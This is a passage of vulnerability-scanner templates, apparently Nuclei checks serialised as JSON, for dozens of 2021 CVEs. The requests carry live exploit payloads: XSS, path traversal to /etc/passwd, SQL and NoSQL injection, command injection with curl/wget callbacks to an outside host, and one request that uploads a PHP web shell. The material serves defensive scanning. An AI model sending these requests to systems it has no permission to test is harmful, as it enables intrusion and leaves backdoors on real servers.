Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo 'CVE-2021-24145'; ?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'CVE-2021-24145')"],"condition":"and"}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6- SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: 